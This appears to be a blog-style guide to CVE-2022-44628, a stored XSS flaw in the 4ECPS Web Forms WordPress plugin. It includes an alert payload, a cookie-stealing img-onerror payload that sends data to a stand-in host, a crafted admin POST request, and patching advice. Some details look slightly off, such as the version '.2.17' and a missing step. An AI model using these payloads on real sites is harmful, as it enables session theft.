CVE-2022-44628 - Exploiting Authenticated Stored XSS in 4ECPS Web Forms Plugin <= .2.17 (WordPress Guide with Code Sample)

---

If you’re running a WordPress site and use the 4ECPS Web Forms plugin by JumpDEMAND Inc., _this is a must-read_. The vulnerability tracked as CVE-2022-44628 lets malicious actors with an Admin or higher role inject stored Cross-Site Scripting (XSS) payloads. If you’re using version .2.17 or older, your website and visitors could be at risk.

Let’s break it down: what’s happening, why it matters, how the exploit works, and what you should do (with easy-to-follow code snippets!).

What is Stored XSS?

Stored XSS means malicious code is saved in your site’s database. When someone views the page, the code runs in their browser—_stealing cookies, hijacking accounts, or defacing content_.

How CVE-2022-44628 Works

In this case, the 4ECPS Web Forms plugin lets an authenticated user (Admin or higher) submit form input with HTML/JavaScript code that doesn’t get sanitized. When anyone else (even Admins or visitors) views the form, that code runs in their browser.

References:  
- WPScan CVE-2022-44628  
- NVD – CVE-2022-44628

Exploit: Step-by-Step Example

Imagine you’re an attacker who already gained Admin access (or a plugin conflict escalated your role). Here’s how you’d drop your payload.

1. Go to 4ECPS Web Forms in your WordPress dashboard

Navigate to the form entries or anywhere the plugin lets you add “Form Name” or other fields.

Instead of a regular name, you enter

<script>alert("XSS by CVE-2022-44628");</script>

or a sneakier payload

<img src=x onerror="fetch('https://yourdomain.com/steal?cookie='+document.cookie)">

3. Save Changes

You save the form or entry.

4. Trigger the Payload

When anyone (even another admin) views the list or details of entries, the browser will execute your JavaScript.

Here’s an exact HTTP POST you might send (using Burp Suite or browser DevTools)

POST /wp-admin/admin.php?page=4ecps_add_form HTTP/1.1
Host: yourwordpresssite.com
Cookie: [admin-session-cookie]

form_name=<script>alert('CVE-2022-44628')</script>&other_param=foo

When another admin visits “Web Forms,” the alert pops. Swap in a keylogger or session stealer for real attacks.

Real-World Impact

- Steal admin cookies/sessions

How to Fix

Step 1: Update 4ECPS Web Forms to the _latest_ version.  
Step 2: Double-check all plugins are kept current.  
Step 3: Review all admin accounts for suspicious users.

References

- WPScan Advisory
- NVD CVE Detail

In Summary

CVE-2022-44628 is a potent, real threat for WordPress admins. If you use 4ECPS Web Forms, patch it without delay. If you’re hanging onto older plugins for convenience, this is a reminder—security always comes first.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 15:10:00 UTC